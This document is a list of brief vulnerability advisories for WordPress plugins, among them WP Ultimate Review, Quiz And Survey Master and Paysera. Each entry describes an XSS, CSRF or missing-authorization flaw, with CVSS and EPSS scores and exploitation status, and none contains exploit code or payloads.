DOM-based cross-site scripting in WordPress plugin WP Ultimate Review versions ≤2.3.7 allows remote attackers to execute malicious JavaScript in victims' browsers via crafted input that is improperly sanitized during client-side page rendering. The vulnerability requires user interaction (CVSS UI:R) but no authentication (PR:N), enabling attacks via social engineering or malicious links. Exploitation probability is low (EPSS 0.04%, 14th percentile), with no public exploit identified at time of analysis and no confirmed active exploitation (not in CISA KEV).
Authenticated users can access sensitive contact form data and functionality they should not have permission to view or modify due to missing authorization checks in Contact Form by BestWebSoft plugin versions up to 4.3.6. The vulnerability allows logged-in attackers with low-level privileges to bypass access controls and view contact information or modify form settings with only network access and no additional user interaction required. This is not actively exploited according to available intelligence, though the access control bypass pattern is a common attack vector.
Stored cross-site scripting (XSS) in Master Addons for Elementor through version 2.0.9.9.4 allows authenticated users with limited privileges to inject malicious scripts that execute in the browsers of other site visitors, potentially compromising administrator accounts or stealing sensitive data. The vulnerability requires user interaction (UI:R) and affects the plugin's input sanitization during web page generation. With an EPSS score of 0.04% and no confirmed active exploitation, this represents a lower real-world risk despite the moderate CVSS base score of 6.5.
Missing authorization in ExpressTech Systems Quiz And Survey Master WordPress plugin through version 10.3.2 allows unauthenticated remote attackers to read sensitive quiz and survey data by exploiting incorrectly configured access control security levels. The vulnerability is assigned CVSS 5.3 (moderate), affects the plugin across multiple versions, and enables unauthorized information disclosure without requiring authentication or user interaction.
Stored cross-site scripting (XSS) in SimpLy Gallery WordPress plugin (versions up to 3.3.2.1) allows authenticated users with low privileges to inject malicious scripts that execute in the browsers of other site visitors, potentially leading to session hijacking, credential theft, or site defacement. The vulnerability requires user interaction (UI:R) and affects confidentiality, integrity, and availability. No public exploit code or active exploitation has been confirmed; EPSS score of 0.04% indicates low real-world exploitation probability despite the moderate CVSS rating.
Stored XSS in Make Section & Column Clickable For Elementor WordPress plugin (versions through 2.4) allows authenticated users with high privileges to inject malicious scripts that execute in other users' browsers. The vulnerability requires user interaction (UI:R) and affects site confidentiality, integrity, and availability with limited scope. EPSS score of 0.04% indicates low exploitation probability despite the presence of a public vulnerability disclosure.
Cross-Site Request Forgery in WordPress New User Approve plugin (versions ≤3.2.3) enables unauthenticated remote attackers to trick authenticated administrators into executing unauthorized actions via crafted requests. With EPSS probability of 0.02% (5th percentile) and no evidence of active exploitation (not in CISA KEV), this represents a moderate real-world risk despite a CVSS 7.1 score. The vulnerability requires user interaction (UI:R) but no attacker privileges (PR:N), making it viable through social engineering tactics like phishing emails containing malicious links.
Xagio SEO WordPress plugin through version 7.1.0.35 contains a missing authorization vulnerability that allows authenticated users to perform unauthorized actions due to incorrectly configured access control security levels. The vulnerability has a CVSS score of 4.3 with low real-world exploitation probability (EPSS 0.04%), affecting authenticated users who can bypass intended access restrictions to modify plugin functionality or settings.
Missing authorization in Easy Payment Payment Gateway for PayPal (woo-paypal-gateway) WordPress plugin versions up to 9.0.53 allows unauthenticated remote attackers to access sensitive payment gateway data through improper access control configuration. The vulnerability enables unauthorized information disclosure with low confidentiality impact. EPSS score of 0.04% indicates minimal observed exploitation probability despite network accessibility and no authentication requirement.
Paysera WooCommerce Payment Gateway plugin through version 3.10.0 contains a missing authorization flaw allowing authenticated users with lower privilege levels to access or perform actions intended for higher-privilege roles, resulting in limited information disclosure. The vulnerability stems from incorrectly configured access control checks and has an EPSS score of 0.04% (11th percentile), indicating low real-world exploitation probability despite the CVSS 4.3 rating and authenticated attack vector.